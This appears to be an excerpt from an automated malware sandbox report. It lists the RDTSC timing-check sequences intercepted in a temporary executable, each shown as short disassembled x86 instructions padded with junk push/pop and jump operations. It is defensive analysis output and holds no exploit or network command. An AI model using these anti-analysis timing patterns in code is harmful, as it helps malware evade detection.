                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 728530 second address: 728536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 728536 second address: 72853F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72853F second address: 72854F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB2Ch 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 728AF3 second address: 728B14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F69D1080A4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F69D1080A48h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 728B14 second address: 728B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72CA6D second address: 72CA7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 ja 00007F69D1080A46h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72CBCA second address: 72CBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72CBD1 second address: 72CBD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72CBD6 second address: 72CBE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72CF0C second address: 72CF27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F69D1080A48h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F69D1080A4Bh 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72CF27 second address: 72CF31 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72CF31 second address: 72CF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72CF35 second address: 72CF39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72D351 second address: 72D372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F69D1080A50h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7320A3 second address: 7320C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push edi 0x00000008 jmp 00007F69D121AB2Ah 0x0000000d pop edi 0x0000000e popad 0x0000000f jnp 00007F69D121AB32h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 737F5F second address: 737F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F69D1080A46h 0x0000000a jmp 00007F69D1080A4Bh 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 jc 00007F69D1080A46h 0x0000001b popad 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 737F87 second address: 737F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 737F8D second address: 737FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D1080A4Bh 0x00000009 popad 0x0000000a jmp 00007F69D1080A4Fh 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 73867C second address: 738682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 738682 second address: 738686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 738686 second address: 73868A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 737A3E second address: 737A51 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F69D1080A4Ch 0x00000008 jc 00007F69D1080A46h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 740DFF second address: 740E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 740E03 second address: 740E46 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F69D1080A62h 0x0000000c jmp 00007F69D1080A53h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 740E46 second address: 740E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 740E51 second address: 740E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F69D1080A51h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 740E6D second address: 740E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F69D121AB26h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 740FF2 second address: 741000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F69D1080A46h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 74EC41 second address: 74EC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F69D121AB26h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 74EC4B second address: 74EC4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 74EC4F second address: 74EC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F69D121AB26h 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 74EC5F second address: 74EC6E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007F69D1080A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 74EC6E second address: 74EC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 75402C second address: 754032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 754032 second address: 754038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 754038 second address: 754040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 754040 second address: 75405A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB31h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 75405A second address: 754064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F69D1080A46h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 753C4A second address: 753C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 je 00007F69D121AB26h 0x0000000e jmp 00007F69D121AB31h 0x00000013 popad 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007F69D121AB31h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 75BA36 second address: 75BA7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A52h 0x00000007 jmp 00007F69D1080A55h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F69D1080A57h 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 75BA7C second address: 75BA8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F69D121AB2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 761E61 second address: 761E80 instructions: 0x00000000 rdtsc 0x00000002 js 00007F69D1080A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F69D1080A55h 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 761E80 second address: 761EB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB38h 0x00000007 jo 00007F69D121AB3Ah 0x0000000d jmp 00007F69D121AB2Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 761CA3 second address: 761CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 ja 00007F69D1080A46h 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F69D1080A46h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 jnc 00007F69D1080A46h 0x0000001f jmp 00007F69D1080A4Ch 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 761CD5 second address: 761CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 764332 second address: 76437F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F69D1080A4Ah 0x00000008 jne 00007F69D1080A46h 0x0000000e jbe 00007F69D1080A46h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jns 00007F69D1080A5Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F69D1080A4Ch 0x00000025 jp 00007F69D1080A46h 0x0000002b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 76437F second address: 7643A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F69D121AB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F69D121AB38h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 76B3F4 second address: 76B409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F69D1080A4Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 76B409 second address: 76B429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F69D121AB38h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 76B429 second address: 76B42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 76B820 second address: 76B852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F69D121AB2Fh 0x0000000f jmp 00007F69D121AB39h 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 76B9A9 second address: 76B9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 76B9AE second address: 76B9C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F69D121AB2Ch 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 76B9C0 second address: 76B9DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 jno 00007F69D1080A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 77278E second address: 772796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 772796 second address: 77279C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 77279C second address: 7727A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 78BE51 second address: 78BE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 78BCA9 second address: 78BCB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 78BCB0 second address: 78BCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D1080A52h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 78BCD1 second address: 78BCD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 78BCD5 second address: 78BCD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 78BCD9 second address: 78BCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 78F78C second address: 78F79E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F69D1080A4Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 78F8EA second address: 78F902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F69D121AB2Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7A8834 second address: 7A8840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F69D1080A46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7A8840 second address: 7A885E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F69D121AB39h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7A885E second address: 7A8863 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7A77C8 second address: 7A77CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7A7EAF second address: 7A7EB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7A9ED9 second address: 7A9EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7A9EDD second address: 7A9EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7A9EE1 second address: 7A9EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F69D121AB2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7ACAA0 second address: 7ACAC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F69D1080A55h 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7ACD65 second address: 7ACD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7ACD69 second address: 7ACD74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F69D1080A46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7ACD74 second address: 7ACDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jnl 00007F69D121AB2Ah 0x00000010 push dword ptr [ebp+122D2D1Ah] 0x00000016 pushad 0x00000017 jmp 00007F69D121AB32h 0x0000001c mov ebx, dword ptr [ebp+122D3719h] 0x00000022 popad 0x00000023 mov dx, 8D6Bh 0x00000027 call 00007F69D121AB29h 0x0000002c ja 00007F69D121AB30h 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7ACDC0 second address: 7ACDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F69D1080A4Ch 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7ACDD4 second address: 7ACE04 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F69D121AB3Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F69D121AB2Ch 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7ACE04 second address: 7ACE18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A50h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7ACE18 second address: 7ACE3E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F69D121AB36h 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7ACE3E second address: 7ACE45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7ACE45 second address: 7ACE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7ACE56 second address: 7ACE5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7ACE5C second address: 7ACE72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F69D121AB31h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
